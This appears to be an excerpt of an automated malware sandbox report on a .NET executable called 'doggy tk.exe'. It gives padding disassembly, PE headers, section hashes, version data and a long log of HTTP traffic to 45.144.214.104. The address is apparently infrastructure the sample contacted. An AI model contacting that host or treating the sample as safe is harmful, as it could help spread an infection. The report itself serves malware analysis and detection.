                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xd61700x4b.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xd80000x5a8.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xda0000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000xd41c40xd4200ba6bd17163f376d121c0f6f12e13206aFalse0.6835200906010607data7.249942036887339IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rsrc0xd80000x5a80x6006dd439aed2458fd8d396d86024daded4False0.4186197916666667data4.064477882806102IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0xda0000xc0x200002bc9c51caa82a2c22b1086e5407b27False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_VERSION0xd80a00x31cdata0.4271356783919598
                                            RT_MANIFEST0xd83bc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                            DLLImport
                                            mscoree.dll_CorExeMain
                                            DescriptionData
                                            Translation0x0000 0x04b0
                                            Comments
                                            CompanyName
                                            FileDescriptiondoggy tk
                                            FileVersion1.0.0.0
                                            InternalNamedoggy tk.exe
                                            LegalCopyrightCopyright 2011
                                            LegalTrademarks
                                            OriginalFilenamedoggy tk.exe
                                            ProductNamedoggy tk
                                            ProductVersion1.0.0.0
                                            Assembly Version1.0.0.0
                                            TimestampSource PortDest PortSource IPDest IP
                                            Mar 3, 2025 08:45:52.689549923 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:52.694655895 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:52.694756985 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:52.701298952 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:52.706388950 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:53.879551888 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:53.879576921 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:53.879590034 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:53.879600048 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:53.879611969 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:53.879625082 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:53.879623890 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:53.879637957 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:53.879650116 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:53.879653931 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:53.879662037 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:53.879683018 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:53.879683018 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:53.879704952 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:53.879723072 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:53.884787083 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:53.884800911 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:53.884812117 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:53.884865999 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:53.927818060 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.012824059 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.012840033 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.012851954 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.012866974 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.012881041 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.012893915 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.012898922 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.012948036 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.013462067 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.013473988 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.013484955 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.013530970 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.013631105 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.013643026 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.013672113 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.014502048 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.014513969 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.014524937 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.014537096 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.014548063 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.014553070 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.014575005 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.014611959 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.015486956 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.015505075 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.015511036 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.015522003 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.015537977 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.015563011 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.015614033 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.016293049 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.016339064 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.140646935 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.140697002 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.140710115 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.140831947 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.140862942 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.140902996 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.140914917 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.140938997 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.140950918 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.140964031 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.140989065 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.141772985 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.141789913 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.141808987 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.141822100 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.141833067 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.141834021 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.141855001 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.142674923 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.142685890 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.142698050 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.142716885 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.142719030 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.142733097 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.142741919 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.142766953 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.143593073 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.143613100 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.143629074 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.143642902 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.143655062 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.143662930 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.143698931 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.144498110 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.144509077 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.144529104 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.144541979 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.144556046 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.144565105 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.144607067 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.145381927 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.145404100 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.145416975 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.145427942 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.145441055 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.145442963 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.145554066 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.193490028 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.271709919 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.271724939 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.271733046 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.271776915 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.271822929 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.271841049 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.271852970 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.271863937 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.271893024 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.271902084 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.271914005 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.271943092 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.271955967 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.271956921 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.271970034 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.272016048 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.272836924 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.272849083 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.272860050 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.272871971 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.272882938 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.272892952 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.272893906 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.272907019 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.272912979 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.272917986 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.272928953 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.272937059 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.272959948 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.272979975 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.273684025 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.273706913 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.273720026 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.273765087 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.273802042 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.273814917 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.273825884 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.273840904 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.273845911 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.273861885 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.273868084 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.273875952 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.273915052 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.274739027 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.274749994 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.274761915 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.274782896 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.274792910 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.274795055 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.274810076 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.274823904 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.274826050 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.274841070 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.274852037 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.274853945 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.274876118 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.274914026 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.275609970 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.275631905 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.275644064 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.275701046 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.275707960 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.275712967 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.275727034 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.275738001 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.275748968 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.275749922 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.275763988 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.275775909 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.275789976 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.276598930 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.276611090 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.276623011 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.276633978 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.276642084 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.276664972 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.318691969 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.402520895 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.402538061 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.402550936 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.402564049 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.402611971 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.402661085 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.402673006 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.402676105 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.402709007 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.402713060 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.402744055 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.402754068 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.402767897 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.402782917 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.402790070 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.402796030 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.402802944 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.402815104 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.402847052 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.402869940 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.402880907 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.402894020 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.402910948 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.402915001 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.402925014 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.402951956 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.403007984 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.403662920 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.403675079 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.403691053 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.403702021 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.403717995 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.403722048 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.403733015 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.403745890 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.403755903 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.403784990 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.404078007 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.404320002 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.404331923 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.404340029 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.404344082 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.404355049 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.404366970 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.404367924 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.404378891 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.404392004 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.404392958 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.404405117 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.404417038 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.404428959 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.404439926 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.404439926 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.404453039 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.404469013 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.404474020 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.404503107 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.405040026 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.405050993 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.405062914 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.405082941 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.405087948 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.405093908 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.405106068 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.405108929 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.405119896 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.405144930 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.405150890 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.405155897 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.405168056 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.405181885 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.405200958 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.405206919 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.405219078 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.405230045 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.405234098 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.405241966 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.405268908 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.406016111 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.406060934 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.406136990 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.406188965 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.406200886 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.406236887 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.406238079 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.406248093 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.406260014 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.406270027 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.406311035 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.406333923 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.406351089 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.406362057 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.406374931 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.406388044 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.406399965 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.406409025 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.406413078 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.406447887 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.407068014 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.407088995 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.407102108 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.407114029 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.407125950 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.407134056 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.407136917 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.407150030 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.407159090 CET4970580192.168.2.745.144.214.104
                                            Mar 3, 2025 08:45:54.407160997 CET804970545.144.214.104192.168.2.7
                                            Mar 3, 2025 08:45:54.407175064 CET804970545.144.214.104192.168.2.7
